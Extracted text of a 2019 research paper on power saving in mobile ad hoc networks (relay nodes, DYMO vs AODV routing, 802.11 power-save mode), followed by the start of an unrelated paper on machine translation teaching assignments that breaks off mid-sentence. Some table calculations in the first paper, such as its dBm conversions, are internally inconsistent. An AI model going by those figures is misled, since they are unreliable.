Strength). It pursues the standard ‘‘if the nodes are adjacent to one another, RSS is high’’, If RSS is high than threshold value then the node will consider forwarding the packet via that route. Jain (2012) provides the comparative assessment of battery usages with the existing system reports under portable situations. Apart from that, the heterogeneous system topology gives its points of interest over existing systems. The batteries, for example, AA and AAA are utilized in service life estimator mode and this model has been viewed as the battery model which gives data on remaining battery in a node after a particular simulation time. Energy models for the BS (base station), RS, (relay station) and MS (mobile station) are considered, for which the Qualnet simulator give the energy utilization of the node. Swain et al. (2013) focused on discrete time Markov chain model that functions for the delivery of Announcement Traffic Indication Map (ATIM) and data frames in IEEE 802.11 DCF power save mode, and further introduces analytical models and power utilization of the IEEE 802.11 DCF in PSM. The observation of the impact of the span of beacon interval on the network execution confirms the requirement for a dynamic beacon window based power saving mechanism to increase the network lifetime without deteriorating the network performance. Moustafa, Vasan & Raymond (2002) informed that, in DCF, the wait state ensures independence from deadlocks, as one station could conceivably be starved and due to the synchronous task between the AP and the stations, PCF deadlock freedom is achieved. Anuj, Sadawarti & Anil (2013) performed operations on DYnamic Manet On-demand (DYMO) routing protocol and investigated its execution depending on different simulation parameters. The simulation has been performed with variable pause times and concluded that DYnamic Manet On-demand (DYMO)’s performance is better in every aspect when compared to existent routing Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 7/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228 protocols. Saranya & Ravi (2015) proposed number of strategies like power saving by varying transmission power, power saving by utilizing power-aware routing protocol, and power saving by employing power management techniques, which also gives a superior view on which strategy can be utilized relying upon the situation. The techniques studied can be utilized on scenarios such as, distance between two nodes, its delay tolerance, data traffic rate, and critical utilization of battery. Furthermore, it proposes that utilizing an appropriate algorithm which not just improves the survival time of the system but also makes the communication increasingly effective. Sangwan & Pooja (2016) mentioned about different approaches to preserve power for the efficient working of the network with the goal that ‘it can stay in functioning mode to the extent that it would be possible’. Some of them are energy effective routing protocol, minimum battery cost routing, bee ad hoc, sleep impact, mobility model, power conservation in node, heterogeneous and homogeneous system. Lubna Naaz Fatima, Fahmina Taranum, Syeda Hajra Mahin gave detailed analysis of different types of routing algorithm in Fatima, Mahin & Taranum (2019) and a survey on different strategies that can be used for efficient power consumption and reduction in power consumption to enhance the network lifespan. Whereas in Taranum, Khaleel Ur & Muhammed (2019) gave a comparison between the IEEE standards 802.11 and 802.16 in terms of power consumption among the mobile nodes, relay node and base station. This paper made use of energy models and battery models. Further, the authors implemented the Code-Division Multiple Access (CDMA) to increase the signal range between the relay node and the base node. MATERIALS & METHODS The proposed architecture can be mainly categorized into two, 1) Network Architecture without Relay Node 2) Network Architecture with a Relay Node Network topology without Relay Node: In this segment, network topology is modeled using the Qualnet simulator. The structure of the framework is given in Fig. 2. The arrangement contains one base station i.e., node 7 and is responsible for forwarding the data to the respective destined nodes, three mobile stations i.e., node 1, 2 and 3 that travel along the trajectory represented with red flags, a subnet, CBR (traffic generator) and point to point link (blue dashed line). Node 7 is linked with mobile nodes using a subnet. Network Topology with Single Relay Node: Up until now it is very clear that multi-hop relay systems can find it as being an increasingly productive procedure to enhance the present state affairs. Presently, pondering upon an exceedingly portable condition, this paper takes into account the single hop architecture for the network. Figure 3 portrays the model that has been created with the assistance of the Qualnet simulator. The arrangement contains one base station, i.e., node 7, one relay station i.e., node 8, three mobile stations i.e., node 1, 2 and 3, two subnets, CBR (traffic generator) and point to point link (Blue dashed line). The relay node acts as a caching node, likewise responsible for communication between the source and destination nodes in the framework. Node 8 acts as a relay node/ intermediate node, whenever the source node and the destination node Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 8/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228 Figure 2 Network architecture without relay node. An architecture unveiling three mobile nodes and an access point connected via a point to point link and CBR traffic generator. Full-size DOI: 10.7717/peerjcs.228/fig-2 are beyond reach, multi-hop data transfer can be conducted through intermediate/relay nodes. Since the node 8 is adjacent to base node it tends to receive the data from it and forwards it to the mobile nodes. Simulation parameters The nodes present in the pair of the architectures can be configured by the means of the parameters specified in Table 1. The energy model parameters specified in Table 2 enable the user to assign the energy utilization of the nodes in various power modes (Transmit, Receive, Idle, and Sleep). Table 3 encompasses the battery model parameters that give an exact evaluation of the life of a device that put to use battery under predefined circumstances. The parameters specified in Table 4 aims to enable the Power Saving Mode for an access point, whereas the parameters specified in Table 5 intends to enable the Power Saving Mode for a mobile station. Figure 4 indicates the flow of Power Saving Mode. Scenarios Results for more than one scenario is generated i.e., Results are provided for not only the amount of power saved but also to obtain a power efficient routing protocol. Case 1) Comparison between Routing Protocols Based on Power Consumption Comparison of energy consumption of nodes using Ad hoc On-Demand Distance Vector (AODV) and DYnamic Manet On-demand (DYMO) routing protocol is given for architecture with relay node using IEEE 802.16 for 60 seconds of simulation time, to obtain Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 9/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-2 http://dx.doi.org/10.7717/peerj-cs.228 Figure 3 Network architecture with a relay node. An architecture unveiling three mobile nodes, an ac- cess point and a relay node connected via a point to point link and CBR traffic generator. Full-size DOI: 10.7717/peerjcs.228/fig-3 Table 1 Node configuration parameters. Parameters for basic configuration of mobile nodes, relay node and access point. Parameters Values Mobility model File-based Network protocol IPv4 Routing protocol Dymo Radio type 802.11/802.16 Mac protocol 802.11b/802.16 IP input Queue Size 50,000 bytes Promiscuous mode Enabled Antenna model Omnidirectional Path loss model Two ray Fading model Ricean Maximum velocity 20 m/s a power efficient routing protocol. Case 1 also made use of Energy model, Battery models and CSMA/CA (Carrier Sense Multiple Access/Collision Avoidance). Case 2) Energy Consumption of Nodes using Power Saving Mode Case 2 made use of both the architectures i.e., with and without multi hop relay strategy to give a comparative assessment of power consumption between the architectures, also Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 10/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-3 http://dx.doi.org/10.7717/peerj-cs.228 Table 2 Energy model parameters. Parameters to enable user-specified energy model in mobile node, re- lay node and an access point. Parameters Value Energy model User-defined Transmission current load 280 mAmp Reception Load 204 mAmp Idle current Load 178 mAmp Sleep current Load 14 mAmp Supply voltage of interface 3.0 V Table 3 Battery model parameters. Parameters to enable battery model in mobile node, relay node and an access point. Parameters Value Battery model Service Life Estimator Battery charge monitoring interval 60 s Battery type MS- Duracell AAA, RN-Duracell AA, BS-Duracell AA Table 4 Power Saving Mode at mobile node. Parameters to enable Power Save Mode in the mobile node and relay node. Parameter Value Power Saving Mode Enabled Station Scan type Passive DTIM period 3 Listen interval 10 utilizing 802.11 Power Saving Mode, Energy model, Battery model and DYnamic Manet On-demand (DYMO) routing protocol. Case 3) Energy Consumption of Nodes for 802.16 Case 3 made use of both the architectures i.e., with and without multi hop relay strategy to give a comparative assessment of power consumption between the architectures, also utilizing energy model, battery model and DYnamic Manet On-demand (DYMO) routing protocol. Case 4) Comparison of 802.11, 802.11 e and 802.11 Power Saving Mode Case 4 generated results for 802.11, 802.11e (Mobility Model) and 802.11 Power Saving Mode for metrics such as End to End Delay and Jitter to monitor the quality of service. Case 4 also utilized energy models, battery model and DYnamic Manet On-demand (DYMO) routing protocol for architecture with relay node. Algorithm for Power Saving Mode of a mobile station Step 1: Configure the 802.11 Power Saving Mode parameters on the node Enter the Power Saving Mode by setting the MNGMT PSW bit as 1 Set the listening interval (units = time) and send the association request to access point Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 11/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228 Table 5 Power Saving Mode at an access point. Parameters to enable Power Save Mode in an access point. Parameter Value Station type Access point Power Saving Mode Enabled BEACON-INTERVAL 200 BEACON-STATIONRT-TIME 10 DTIM-PERIOD 3 Step 2: Enter the sleep State Step 3: During Listening interval, node wakes up Step 4: Listen to the Beacon nodes If (The beacon nodes contains the association ID of the station and bitmap control=0). Then Send PS-POLL to Access Point to retrieve the data Go to step 5 Else Go to step 2 Step 5: Send Acknowledgement frames to Access point after receiving the data Step 6: Go to step 4 Algorithm to calculate the power consumption Step 1: Initialize the variables: Duration, Actual duration = 0, Pxi (Energy consumed by current mode) = 0, now=getNodeTime (); Step 2: Generate values for the above variables of a node at a particular instance Actual Duration = (now-Start time)/seconds; If (Duration = actDuration) Then go to step 6 Else Go to step 3 Step 3: Check the State of the battery. If(Remaining battery charge! = 0) then Go to step 4 and calculate the power consumption in current mode and decrement the battery charge. Else Now = dead time of battery; Go to step 6 Step 4: Calculate the energy consumed by node Energy consumed in Transmit mode, Et = Transmitting Current * Voltage * Time Energy consumed in Receive mode, Er = Receiving Current * Voltage * Time Energy consumed in Idle mode, Ei = Idle Current * Voltage * Time Energy consumed in Sleep mode, Es = Sleep Current *Voltage * Time Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 12/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228 Figure 4 Algorithm for Power Saving Mode. A step-by-step procedure on the working of Power Saving Mode for the mobile nodes. Full-size DOI: 10.7717/peerjcs.228/fig-4 Remaining battery charge = Total battery charge–Energy consumed by current activity (Ex) Increment the value of Energy consumed in X mode. Total energy in X (Transmit/ Receive/ Idle/ Sleep) mode =Ex + Pxi Pxi = Total energy in X mode; Step 5: Go to step 2 Step 6: Print the output Power consumption at Mobile Station = Ptrans + Precv + Pidle + Psleep (all MS) Power consumption at Base Station = Ptrans + Precv + Pidle + Psleep (all BS) Power consumption at Relay Station = Ptrans + Precv + Pidle + Psleep (all RS). Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 13/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-4 http://dx.doi.org/10.7717/peerj-cs.228 Figure 5 Comparison of AODV and DYMO. A graphical representation giving a comparison on the working of AODV and DYMO routing protocol in terms of energy utilization. Full-size DOI: 10.7717/peerjcs.228/fig-5 RESULTS Case 1: Comparison between routing protocols based on power consumption The results were established for the architecture that made use of the network topology parameters and energy model parameters. It also utilizes the IEEE 802.16 standard for AODV and DYMO routing protocol for 60 s. Execution of AODV and DYMO for power utilization is assessed, and a combined graphical representation in Fig. 5 is given to clarify the performance of AODV and DYMO where N1, N2, and N3 are mobile stations, N7 is the base station and N8 is the relay station. Thus, from this representation it can be derived that DYMO consumes less power when compared with AODV. In this way, it is inferred that the usage of DYMO is extremely productive regarding energy utilization, thus expanding the service life of the battery. Case 2: Energy consumption of nodes using Power Saving Mode The simulations have been carried out by employing user-defined energy model, battery models and DYMO routing protocol for 802.11 standards including Power Save Mode on both the topologies i.e., architecture without relay node and architecture with relay node. User-defined energy model allows the user to specify the amount of energy that can be utilized for each of the above-mentioned modes, such that the power utilization are below Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 14/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-5 http://dx.doi.org/10.7717/peerj-cs.228 Figure 6 Average of service of mobile nodes using PSM for 100 min. A graphical representation of aver- age residue power for architecture with and without relay node; the green bars represents average service life of the proposed strategy i.e., Power Saving Mode of IEEE 802.11, whereas the yellow bars represents average service life of the existing system strategy i.e., simply making use of IEEE 802.11 for 100 minutes of simulation time. Full-size DOI: 10.7717/peerjcs.228/fig-6 mentioned with the threshold level so as to prevent the network from early exhaustion. On comparing the average of the service life obtained in (Jain, 2012) for 100, 200 and 300 min and the average of the service life obtained in case 2 scenario for simulation time 100, 200 and 300 min, it can be estimated that PSM proves to be efficient. The comparison for the values generated in (Jain, 2012) and case 2 scenario can be depicted from Figs. 6, 7 and 8 The service life of batteries is assessed utilizing Eqs. (1), (2) and (3) and is captured in Table 6. The total residue provided by case 2 scenario for simulation time 100, 200 and 300 min is 32.941, 29.9423, and 28.203 dBm where as the total residue provided in (Jain, 2012) for simulation time 100, 200 and 300 min is 7.49, 7.90 and 9.38 dBm. Case 3: Energy consumption of nodes for 802.16 In this section, the simulations are performed using energy model parameters, battery model parameters, IEEE 802.16, and DYMO routing protocol for 100, 200 and 300 min on both architectures i.e., architecture with relay node and architecture without relay node. After performing the simulation, the estimations of the average of the residual of battery Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 15/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-6 http://dx.doi.org/10.7717/peerj-cs.228 Figure 7 Average of residue power of mobile nodes using PSM for 200 min. A graphical representation of average residue power for architecture with and without relay node, the green bars represents average service life of the proposed strategy i.e., Power Saving Mode of IEEE 802.11 whereas the yellow bars repre- sents average service life of the existing system strategy i.e., simply making use of IEEE 802.11 for 200 min- utes of simulation time. Full-size DOI: 10.7717/peerjcs.228/fig-7 in mAh for every mobile station for case 3 scenario and the average of the residue in (Jain, 2012) are captured, and a comparative assessment is given in Fig. 9 for the duration of 100 min, for 200 min in Fig. 10, and for 300 min in Fig. 11. Assessments are performed to get the net power saving utilizing the below formulas: X(a) = Average Energy of Mobile Stations in Architecture without Relay Node X(b) = Average Energy of Mobile Stations in Architecture with a Relay Node X(net)=X(b)−X(a)(mAh) To get the power saving in dBm the following conversions take place as shown, (X)mAh∗(V )=(Y )mWh (1) (Z)mW =YmWh/Simulation time (hours) (Watt-hour to milliwatt Conversion) (2) Power−dBm=10.0∗(log(Z(mW)/1mW )) (3) Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 16/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-7 http://dx.doi.org/10.7717/peerj-cs.228 Figure 8 Average of residue power of mobile nodes using PSM for 300 min. A graphical representation of average residue power for architecture with and without relay node, the green bars represents average service life of the proposed strategy i.e., Power Saving Mode of IEEE 802.11 whereas the yellow bars repre- sents average service life of the existing system strategy i.e., simply making use of IEEE 802.11 for 300 min- utes of simulation time. Full-size DOI: 10.7717/peerjcs.228/fig-8 Table 6 Evaluation of net power saving in case 2 scenario. Simulation time No Hop 802.11 (mAh) Hop 802.11 (mAh) Difference (Hop-No Hop) Y (mAh) X(mWh)=V ∗Y Z =Log(X(mW )) PdBm=10∗Z 100 1,665.417 2,754.73 1,089.313 3,267.939 3.294165 32.941 200 1,635.15 2,730.52 1,095.37 3,286.11 2.99423 29.9423 300 1,604.377 2,706.3 1,101.923 3,305.769 2.82030 28.203 The evaluated results for 100, 200, and 300 simulation time are captured in Table 7. It can be deduced that the service life obtained for simulation time 100,200 and 300 min is 2.6845, 2.6845 and 1.443873 dBm. It can also be concluded that, since case 3 makes no use of power saving mode, the residual battery charge is very low. Hence, PSM proves its efficiency. Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 17/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-8 http://dx.doi.org/10.7717/peerj-cs.228 Figure 9 Average of residue power of mobile nodes using 802.16 for 100 minutes. A graphical represen- tation of average residue power for architecture with and without relay node; the green bars represents av- erage service life of strategy that made use of IEEE 802.16, whereas the yellow bars represents existing sys- tem strategy i.e., simply making use of IEEE 802.11 for 100 minutes of simulation time. Full-size DOI: 10.7717/peerjcs.228/fig-9 Case 4: comparison of 802.11, 802.11 e and 802.11 Power Saving Mode A comparison is done between 802.11, 802.11 e and 802.11 Power Saving Mode by considering metrics such as end-to-end delay and average jitter. From Fig. 12 it can be concluded that end-to-end delay and average jitter is negligible in 802.11, whereas in 802.11 e, it is minimal. Though power consumption is less in Power Saving Mode but average jitter and end-to-end delay is high in comparison with 802.11 and 802.11 DISCUSSION In our findings certain approaches are implemented so as to restrict the power utilization among the nodes in the system, which utilizes IEEE standards—IEEE 802.11 and IEEE 802.16. Distributed coordinated function (DCF) assumes to evade the crash and conflict involved in the wireless medium by utilizing certain parameters. For example, DIFS, SIFS, back off interval time and network allocation vector (NAV) among the stations. Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 18/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-9 http://dx.doi.org/10.7717/peerj-cs.228 Figure 10 Average of residue power of mobile nodes using 802.16 for 200 min. A graphical representa- tion of average residue power for architecture with and without relay node; the green bars represents aver- age service life of strategy that made use of IEEE 802.16, whereas the yellow bars represents existing system strategy i.e., simply making use of IEEE 802.11 for 200 min of simulation time. Full-size DOI: 10.7717/peerjcs.228/fig-10 Power-aware routing algorithm such as DYMO majorly affects the utilization of energy in the network. Energy model assesses the energy consumed by the nodes. Additionally, the user defined energy model enables the user to specify the threshold value, so that power utilization can be constrained. Battery model gives a summarization of the service time provided by the nodes along with residual charge in the battery for the associated nodes. Power Saving Mode utilizes the beacon frames that act as a cache which stores all information about a station in Power Saving Mode. The access point broadcasts the beacon frames that contain the address of the node, the node for which the data is stocked up at the access point. Whenever the stations hear a beacon frame containing its address, it will awake and after getting acknowledgement in response to PS-POLL frame the station enters the active state. For the above-mentioned theory, simulations were performed by considering different parameters and the outcomes demonstrate that DYMO as the proficient power-aware routing protocol. Apart from that, a correlation was made between the simulation results presented in Jain (2012) and case 2 where Power Saving Mode is administered, it was concluded that Power Saving Mode additionally brings up the considerable power saving Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 19/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-10 http://dx.doi.org/10.7717/peerj-cs.228 Figure 11 Average of residue power of mobile nodes using 802.16 for 300 min. A graphical representa- tion of average residue power for architecture with and without relay node; the green bars represents aver- age service life of strategy that made use of IEEE 802.16, whereas the yellow bars represents existing system strategy i.e., simply making use of IEEE 802.11 for 300 minutes of simulation time. Full-size DOI: 10.7717/peerjcs.228/fig-11 Table 7 Evaluation of net power saving in case 3 scenario. Simulation time No-hop 802.16 Hop 802.16 Current diff (mAh) Power mWh (1) Log(X(mW)) Saving (2)dBm 100 807.514 808.54 1.0267 3.08 0.26845 2.6845 200 598.664 600.73 2.06 6.18 0.26845 2.6845 300 390.45 392.774 2.324 6.97 0.14438 1.443873 option. Case 3 scenarios, on assessment, it is persuaded that case 3 while utilizing 802.16 does not provide much residual power when compared to case 2 results, Hence, power saving mode proves it efficiency, but the results in case 4 presented that Power Saving Mode only diminishes the power usage but the QOS is not achieved. CONCLUSIONS The proposal aims at reducing power consumption in MANET’s by implementing battery model, energy model, DYMO routing protocol and Power Saving Mode by using Qualnet v7.4 simulator. Hence, with the assistance of generated results, an analysis can be made, Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 20/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-11 http://dx.doi.org/10.7717/peerj-cs.228 Figure 12 Performance analysis of 802.11e, 802.11 and 802.11 PSM. Performance of 802.11e, 802.11 and 802.11 PSM is analysed for metrics such as end-to-end delay and jitter for 100 min of simulation time. Full-size DOI: 10.7717/peerjcs.228/fig-12 which suggests that a considerable amount of energy has been preserved and plays a major role to prolong the service life of the battery of mobile devices. The future extension for this system would be in the class of NGN’s, to adequately save power at the mobile stations and further to improve the QoS of the heterogeneous network by reducing its power consumption. Consequently, the implementation may include handover process i.e., horizontal handover, vertical handover and reduction of power consumption during the handover process. An exhaustive examination regarding the Relay station arrangement and execution is essential prior to this heterogeneous system implementation. ACKNOWLEDGEMENTS We would like to acknowledge and thank our college management for providing us enough resources for carrying out our work. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 21/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-12 http://dx.doi.org/10.7717/peerj-cs.228 Competing Interests The authors declare there are no competing interests. Author Contributions • Lubna Naaz Fatima conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, testing. • Syeda Hajra Mahin analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, drafting. • Fahmina Taranum conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, idea. Data Availability The following information was supplied regarding data availability: Raw data and code are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.228#supplemental-information. REFERENCES Anuj KG, Sadawarti H, Anil KV. 2013. Implementation of DYMO routing protocol. In- ternational Journal of Information Technology, Modeling and Computing 1(2):49–57. Bhatt UR, Jain P, Upadhyay R. 2013. An enhanced AODV- energy efficient routing protocol for MANET. In: Nirma university international conference on engineering (NUICONE). Chen X, Xie Y, Wang C. 2011. Implementation and analysis of IEEE 80211 PSM in NS-2. In: International conference on machine learning and cybernetics. Guilin. COMLAB. 2017. Available at http://www.comlab.hut.fi/studies/3240/luentokalvot/4_ wlan2.pdf . DidaWiki. 2011. Available at http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides- 02_dymo_n_2011.pdf . Fatima LN, Mahin SH, Taranum F. 2019. Power management strategies in MANETs— a review. International Journal of Recent Technology and Engineering (IJRTE) 7(6S):33–38. Jain A. 2012. Reduction of power consumption at mobile station in multi-hop networks in mobile environments. In: International conference on emerging technology trends in electronics, communication, and networking. Kandari S, Pandey MK. 2015. Evaluation of energy consumption by nodes of MANET. In: National conference on recent advances in electronics & computer engineering, lIT Roorkee India. Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 22/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228#supplemental-information http://dx.doi.org/10.7717/peerj-cs.228#supplemental-information http://dx.doi.org/10.7717/peerj-cs.228#supplemental-information http://www.comlab.hut.fi/studies/3240/luentokalvot/4_wlan2.pdf http://www.comlab.hut.fi/studies/3240/luentokalvot/4_wlan2.pdf http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides-02_dymo_n_2011.pdf http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides-02_dymo_n_2011.pdf http://dx.doi.org/10.7717/peerj-cs.228 Moustafa AY, Vasan A, Raymond EM. 2002. Specification and analysis of the DCF and PCF protocols in the 80211 standard using systems of communicating machines. In: IEEE. Paris, France. Nand P, Astya R, Ali AW. 2016. Performance analysis and impact of different mobility model on the specific configured network with IEEE 802154 for WSNs. In: Interna- tional conference on computing communication and automation (ICCCA). Sangwan Y, Pooja 1. 2016. A survey on battery conservation approaches in MANET. International Journal of Scientific & Engineering Research 7(12):483–487. Saranya AS, Ravi G. 2015. A review on power saving techniques in MANET. Interna- tional Journal of Scientific and Research Publications 5(5):1–4. Swain P, Chakraborty S, Nandi S, Bhaduri P. 2013. Performance modeling and evaluation of IEEE 80211 IBSS power save mode. In: Elsevier. Guwahati, India. Taranum F, Khaleel Ur RK, Muhammed A. 2019. In: Singh PK, ed. Power consumption analysis in multi-hop networks of mobile environments. Singapore: Springer, 472–483. Thontadharya HJ, Shwetha D, Bhat MS, Devaraju JT. 2013. Effect of idle mode on power savingin mobile WiMAX network. In: Springer. New Delhi. Tripathy S. 2011. Study and analysis of performance of IEEE 802.11 power saving mode. Department of Computer Science and Engineering National Institute of Technology, Rourkela. FURTHER READING dd.wrt.com. 2019. Available at https://wiki.dd-wrt.com/wiki/index.php/Advanced_ wireless_settings. IONOS. 2019. Available at https://www.ionos.com/digitalguide/server/know-how/csmaca- carrier-sense-multiple-access-with-collision-avoidance/ . Kim B, Park J, Choi Y-H. 2006. Power saving mechanisms of IEEE 80216e: sleep mode vs. idle mode. In: International symposium on parallel and distributed processing and applications(ISPA). Bisa Research Grant of Keimyung University and the Research Grant of Kwangwoon University. Rajgor M, Shete P, Awale RN. 2018. Probabilistic energy efficient routing protocol for wireless sensor network. In: International conference on communication information & computing technology (ICCIC). Tanejaa S, Kushb A, Makkarc A, Bhushand B. 2011. Power management in mobile adhoc network. International Transaction Journal of Engineering, Management, & Applied Sciences & Technologies 2(2):12. Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 23/23 https://peerj.com https://wiki.dd-wrt.com/wiki/index.php/Advanced_wireless_settings https://wiki.dd-wrt.com/wiki/index.php/Advanced_wireless_settings https://www.ionos.com/digitalguide/server/know-how/csmaca-carrier-sense-multiple-access-with-collision-avoidance/ https://www.ionos.com/digitalguide/server/know-how/csmaca-carrier-sense-multiple-access-with-collision-avoidance/ http://dx.doi.org/10.7717/peerj-cs.228 work_w36sbsa2pjaoxdslwl2ehwtmba ---- Learning to translate with products of novices: a suite of open-ended challenge problems for teaching MT Adam Lopez1, Matt Post1, Chris Callison-Burch1,2, Jonathan Weese, Juri Ganitkevitch, Narges Ahmidi, Olivia Buzek, Leah Hanson, Beenish Jamil, Matthias Lee, Ya-Ting Lin, Henry Pao, Fatima Rivera, Leili Shahriyari, Debu Sinha, Adam Teichert, Stephen Wampler, Michael Weinberger, Daguang Xu, Lin Yang, and Shang Zhao∗ Department of Computer Science, Johns Hopkins University 1Human Language Technology Center of Excellence, Johns Hopkins University 2Computer and Information Science Department, University of Pennsylvania Abstract Machine translation (MT) draws from several different disciplines, making it a complex sub- ject to teach. There are excellent pedagogical texts, but problems in MT and current algo- rithms for solving them are best learned by doing. As a centerpiece of our MT course, we devised a series of open-ended challenges for students in which the goal was to im- prove performance on carefully constrained instances of four key MT tasks: alignment, decoding, evaluation, and reranking. Students brought a diverse set of techniques to the prob- lems, including some novel solutions which performed remarkably well. A surprising and exciting outcome was that student solutions or their combinations fared competitively on some tasks, demonstrating that even newcom- ers to the field can help improve the state-of- the-art on hard NLP problems while simulta- neously learning a great deal. The problems, baseline code, and results are freely available. 1 Introduction A decade ago, students interested in natural lan- guage processing arrived at universities having been exposed to the idea of machine translation (MT) primarily through science fiction. Today, incoming students have been exposed to services like Google Translate since they were in secondary school or ear- lier. For them, MT is science fact. So it makes sense to teach statistical MT, either on its own or as a unit ∗ The first five authors were instructors and the remaining au- thors were students in the worked described here. This research was conducted while Chris Callison-Burch was at Johns Hop- kins University. in a class on natural language processing (NLP), ma- chine learning (ML), or artificial intelligence (AI). A course that promises to show students how Google Translate works and teach them how to build some- thing like it is especially appealing, and several uni- versities and summer schools now offer such classes. There are excellent introductory texts—depending on the level of detail required, instructors can choose from a comprehensive MT textbook (Koehn, 2010), a chapter of a popular NLP textbook (Jurafsky and Martin, 2009), a tutorial survey (Lopez, 2008), or an intuitive tutorial on the IBM Models (Knight, 1999b), among many others. But MT is not just an object of academic study. It’s a real application that isn’t fully perfected, and the best way to learn about it is to build an MT sys- tem. This can be done with open-source toolkits such as Moses (Koehn et al., 2007), cdec (Dyer et al., 2010), or Joshua (Ganitkevitch et al., 2012), but these systems are not designed for pedagogy. They are mature codebases featuring tens of thousands of source code lines, making it difficult to focus on their core algorithms. Most tutorials present them as black boxes. But our goal is for students to learn the key techniques in MT, and ideally to learn by doing. Black boxes are incompatible with this goal. We solve this dilemma by presenting students with concise, fully-functioning, self-contained com- ponents of a statistical MT system: word alignment, decoding, evaluation, and reranking. Each imple- mentation consists of a naı̈ve baseline algorithm in less than 150 lines of Python code. We assign them to students as open-ended challenges in which the goal is to improve performance on objective eval- uation metrics as much as possible. This setting mirrors evaluations conducted by the NLP research community and by the engineering teams behind high-profile NLP projects such as Google Translate and IBM’s Watson. While we designate specific al- gorithms as benchmarks for each task, we encour- age creativity by awarding more points for the best systems. As additional incentive, we provide a web- based leaderboard to display standings in real time. In our graduate class on MT, students took a va- riety of different approaches to the tasks, in some cases devising novel algorithms. A more exciting re- sult is that some student systems or combinations of systems rivaled the state of the art on some datasets. 2 Designing MT Challenge Problems Our goal was for students to freely experiment with different ways of solving MT problems on real data, and our approach consisted of two separable com- ponents. First, we provided a framework that strips key MT problems down to their essence so students could focus on understanding classic algorithms or invent new ones. Second, we designed incentives that motivated them to improve their solutions as much as possible, encouraging experimentation with approaches beyond what we taught in class. 2.1 Decoding, Reranking, Evaluation, and Alignment for MT (DREAMT) We designed four assignments, each corresponding to a real subproblem in MT: alignment, decoding, evaluation, and reranking.1 From the more general perspective of AI, they emphasize the key problems of unsupervised learning, search, evaluation design, and supervised learning, respectively. In real MT systems, these problems are highly interdependent, a point we emphasized in class and at the end of each assignment—for example, that alignment is an exer- cise in parameter estimation for translation models, that model choice is a tradeoff between expressivity and efficient inference, and that optimal search does not guarantee optimal accuracy. However, present- ing each problem independently and holding all else constant enables more focused exploration. For each problem we provided data, a naı̈ve solu- tion, and an evaluation program. Following Bird et al. (2008) and Madnani and Dorr (2008), we imple- mented the challenges in Python, a high-level pro- 1 http://alopez.github.io/dreamt gramming language that can be used to write very concise programs resembling pseudocode.2,3 By de- fault, each baseline system reads the test data and generates output in the evaluation format, so setup required zero configuration, and students could be- gin experimenting immediately. For example, on re- ceipt of the alignment code, aligning data and eval- uating results required only typing: > align | grade Students could then run experiments within minutes of beginning the assignment. Three of the four challenges also included unla- beled test data (except the decoding assignment, as explained in §4). We evaluated test results against a hidden key when assignments were submitted. 2.2 Incentive Design We wanted to balance several pedagogical goals: un- derstanding of classic algorithms, free exploration of alternatives, experience with typical experimental design, and unhindered collaboration. Machine translation is far from solved, so we ex- pected more than reimplementation of prescribed al- gorithms; we wanted students to really explore the problems. To motivate exploration, we made the as- signments competitive. Competition is a powerful force, but must be applied with care in an educa- tional setting.4 We did not want the consequences of ambitious but failed experiments to be too dire, and we did not want to discourage collaboration. For each assignment, we guaranteed a passing grade for matching the performance of a specific tar- get algorithm. Typically, the target was important but not state-of-the-art: we left substantial room for improvement, and thus competition. We told stu- dents the exact algorithm that produced the target ac- curacy (though we expected them to derive it them- selves based on lectures, notes, or literature). We did not specifically require them to implement it, but the guarantee of a passing grade provided a power- ful incentive for this to be the first step of each as- signment. Submissions that beat this target received additional credit. The top five submissions received full credit, while the top three received extra credit. 2 http://python.org 3 Some well-known MT systems have been 